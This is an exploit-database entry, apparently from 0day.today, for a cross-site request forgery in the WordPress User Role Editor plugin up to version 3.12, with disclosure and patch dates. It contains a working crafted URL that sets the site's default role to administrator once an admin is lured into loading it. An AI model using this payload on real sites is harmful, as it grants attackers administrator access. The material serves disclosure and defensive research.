[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

WordPress User Role Editor 3.12 Cross Site Request Forgery

Author
Henry Hoggard
Risk
[
Security Risk Low
]
0day-ID
0day-ID-20827
Category
web applications
Date add
29-05-2013
Platform
php
# Exploit Title: WP User Role Editor CSRF
# Date: 19/5/13
# Exploit Author: Henry Hoggard
# Author Website: http://henryhoggard.co.uk
# Vendor Homepage:https://wordpress.org/support/plugin/user-role-editor
# Software Link:https://wordpress.org/support/plugin/user-role-editor
# Version: <=3.12
# Tested on: Debian
# CVE : none yet
 
Notified Dev: 16/05/13
Patch Released (3.14): 17/05/13
 
Description:
This allows you to sign up with admin privileges if you make the admin
visit your CSRF script.
 
http://server/wordpress/wp-admin/users.php?page=user-role-editor.php&action=default&user_role=administrator

#  0day.today [2024-11-15]  #